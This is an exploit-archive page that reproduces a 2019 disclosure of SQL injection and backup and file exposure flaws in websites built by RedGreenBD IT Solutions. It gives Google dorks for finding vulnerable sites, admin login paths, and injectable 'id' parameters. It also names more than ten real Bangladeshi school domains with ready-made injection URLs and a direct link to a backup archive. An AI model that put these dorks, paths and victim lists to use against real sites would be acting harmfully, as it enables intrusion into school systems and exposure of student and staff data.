Advertisement






RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010038

Below is a copy:

RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure
###################################################################

# Exploit Title : RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/01/2019
# Vendor Homepage : redgreenbd.com
# Vendor Version : PHP 5.4.45 - LiteSpeed Server - jQuery 1.3.2
# Software Download Link : N/A
# Software : Priced => See Here => redgreenbd.com/pd.php
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''Design & Developed by : RedGreenBD IT Solutions''
intext:''Designed by RedGreenBD IT Solutions''
intext:''Developed by RedGreenBD ITS"
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200: Information Exposure
CWE-538: File and Directory Information Exposure
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-redgreenbd-it-solutions-multiple-vulnerabilities.html

###################################################################

# Admin Panel Login Path / Student-Teacher-Guardian Panel Path =>
***********************************************************

/index.php?q=login-form
/?q=login
/?q=student-login
/wadmin

# SQL Injection Exploit :
**********************

/?q=newsDetail&id=[SQL Injection]

/?q=news-detail&id=[SQL Injection]

/?q=notice-detail&id=[SQL Injection]

/?q=page-detail&id=[SQL Injection]

/?q=home-block&id=[SQL Injection]

/index.php?q=news-detail&id=[SQL Injection]

# Backup Disclosure Exploit [ Example ] => 
***************************************

Look at this /uploads/ folder for backup files.

/uploads/uploads_backup_[DAY]_[MONTH]_[YEAR].zip

/uploads/uploads_backup_18_12_18.zip

/uploads/uploads_backup_21_11_18.zip

# Arbitrary File Disclosure => 
**************************

Look at this folder. 

/uploads/....

/uploads/booklist/ => PDF Files here
/uploads/mnews/ => PDF Files here
/uploads/result/ => PDF Files here
/uploads/routine3/ => PDF Files here
/uploads/syllabus/ => PDF Files here

###################################################################

# Example Vulnerable Sites =>

Note => Bangladesh Education Sites are vulnerable for this security issue.

(104.152.168.23) => There are 899 domains hosted on this server.

[+] dhankhalimuss.edu.bd/?q=newsDetail&id=13%27 => 

+ Proof of Concept for SQL Injection => archive.vn/EJDgW

[+] cmpi.edu.bd/?q=newsDetail&id=13%27

[+] panchjuniadss.edu.bd/?q=newsDetail&id=13%27

[+] ths.edu.bd/?q=newsDetail&id=13%27

[+] rmss.edu.bd/?q=newsDetail&id=13%27

[+] pakhimarapvss.edu.bd/?q=notice-detail&id=3%27

[+] tsbghs.edu.bd/?q=page-detail&id=3%27

[+] nipi.edu.bd/?q=newsDetail&id=13%27

[+] cppi.edu.bd/?q=newsDetail&id=13%27

[+] bsidhaka.edu.bd/?q=newsDetail&id=13%27

[+] bsidhaka.edu.bd/uploads/uploads_backup_21_11_18.zip

###################################################################

# SQL Database Error : 

You have an error in your SQL syntax; check the manual that corresponds 

to your MariaDB server version for the right syntax to use near ''13''' at line 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.